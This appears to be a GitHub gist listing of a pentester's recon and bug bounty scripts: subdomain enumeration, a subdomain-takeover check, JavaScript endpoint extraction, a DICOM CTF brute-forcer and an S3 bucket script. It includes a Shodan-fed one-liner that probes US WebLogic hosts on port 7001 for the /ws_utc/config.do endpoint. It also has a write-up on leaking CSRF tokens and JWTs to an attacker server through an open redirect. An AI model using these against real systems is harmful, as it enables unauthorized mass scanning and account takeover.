
@itsmenaga
itsmenaga / subtone.sh
Last active October 12, 2019 14:04
Subtone - Subfinder with Aquatone. Usage: ./subtone.sh domain.com
#!/bin/bash
# Usage: ./subtone.sh domain.com
# Refuse to run without a domain: with an empty $1 the rm -rf below would
# wipe the whole results directory instead of one target's folder.
if [ -z "$1" ]; then
  echo "Usage: $0 domain.com"
  exit 1
fi
echo "[*] Subfinder and Aquatone Scan Started [*]"
subfinder -d "$1" -o "$1.json" -oT -nW -v
rm -rf "/root/pentest/results/$1"
mkdir -p "/root/pentest/results/$1"
# keep the copy in the working directory; aquatone reads hosts.json from the results folder
cp "$1.json" "/root/pentest/results/$1/hosts.json"
aquatone-scan -d "$1" --ports huge --threads 10
DEBUG=nightmare xvfb-run -a aquatone-gather -d "$1" --threads 10
aquatone-takeover -d "$1" --threads 10
itsmenaga / aq.sh
Created September 8, 2018 16:15 — forked from random-robbie/aq.sh
aq: put it in /bin/ and chmod 777 it
#!/bin/bash
# Usage: aq domain.com
aquatone-discover -d "$1" --threads 10
aquatone-scan -d "$1" --ports huge --threads 10
DEBUG=nightmare xvfb-run -a aquatone-gather -d "$1" --threads 10
aquatone-takeover -d "$1" --threads 10
itsmenaga / gist:5bf91071e040116bd00348ace9f8bd32
Created April 18, 2019 05:51 — forked from Viss/gist:e7c735ed389c8d055e6f31e845f25516
bash one-liner for extracting shodan results for weblogic.
#!/bin/bash
# this script was written by viss as a challenge from @random_robbie
# This one-liner replaces a fairly lengthy python script
# if you want to be walked through it, sign up for square cash, send $viss 20 dollars. Otherwise, flex your google fu!
# oh, ps: you need to pip install shodan, and then configure the shodan cli client by giving it your api key.
# then you're off to the races.
shodan search --fields ip_str --limit 1000 'product:"Oracle Weblogic" port:"7001" country:"US"' | sort -u | nmap -sT -Pn -n -oG - -iL - -p 7001 | grep open | awk '{print $2}' | xargs -I % -n 1 -P 30 bash -c 'RESULT=`curl -s -I -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko0100101 Firefox/54.0" -H "Connection":"close" -H "Accept-Language":"en-US -H en;q=0.5" -H "Accept":"text/html -H application/xhtml+xml -H application/xml;q=0.9 -H */*;q=0.8" -H "Upgrade-Insecure-Requests":"1" %:7001/ws_utc/config.do | egrep HTTP`; echo "%: $RESULT";'
itsmenaga / subdomain.rb
Created April 24, 2019 16:22 — forked from nikallass/subdomain.rb
Subdomain OSINT script, running several best tools.
#Tools based on a resolver.rb by @melvinsh
#Repository: https://github.com/melvinsh/subresolve
#Modified by @ehsahil for Personal Use.
#Modified by @nikallass for Personal Use.
require 'socket'
require 'colorize'
begin
if ARGV[0] == nil

You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input on the client side, and sending sensitive information to my server using an open redirect.

CSRF token bug

  1. There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
  2. User loads https://example.com/?code=VALUE
  3. JavaScript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header x-csrf-token set to the CSRF token for the session of the user
    GET /verify/VALUE HTTP/1.1
    Host: example.com
    
itsmenaga / openinbrowser.py
Created May 19, 2019 05:46 — forked from hakluke/openinbrowser.py
Little Python script to open a list of URLs from a file in browser tabs, n tabs at a time
#! /usr/bin/python3
import webbrowser, sys
if len(sys.argv) < 3:
    print("Usage: openinbrowser.py ./urls.txt 20")
    quit()
f = open(sys.argv[1])
tabs = int(sys.argv[2])
counter = 1
itsmenaga / ejs.sh
Created April 17, 2020 20:20 — forked from gwen001/ejs.sh
one-liner to extract endpoints from JS files of a given host
curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(\>\>\>)|(['\\\"](https?:)?[/]{1,2}[^'\\\"]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu
function ejs() {
curl -L -k -s "$1" | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu
}
itsmenaga / dicom-bruteforce.py
Created April 29, 2020 18:11 — forked from ianatha/dicom-bruteforce.py
DEFCON 27 BHV CTF
#!/usr/bin/env python3
# run me with ulimit -n 2048
import itertools
import string
from pydicom.dataset import Dataset
from pynetdicom import AE, QueryRetrievePresentationContexts
from pynetdicom.sop_class import PatientRootQueryRetrieveInformationModelFind
import sys
import time
itsmenaga / user.js
Created May 15, 2020 15:22 — forked from AetherEternity/user.js
Silent firefox
// Mozilla User Preferences
// To change a preference value, you can either:
// - modify it via the UI (e.g. via about:config in the browser); or
// - set it within a user.js file in your profile (create it if it doesn't exist).
//
// Profile folder location on different systems:
// Windows: C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\xxxxxxxx.default
// Mac OS X: Users/<username>/Library/Application Support/Firefox/Profiles/xxxxxxxx.default
// Linux: /home/<username>/.mozilla/firefox/xxxxxxxx.default
#!/bin/bash
# Usage: ./script.sh bucket-name
touch index.html
touch error.html
aws s3api create-bucket --bucket "$1" --region us-east-1
aws s3 website "s3://$1/" --index-document index.html --error-document error.html
aws s3 cp index.html "s3://$1" --acl public-read
aws s3 cp error.html "s3://$1" --acl public-read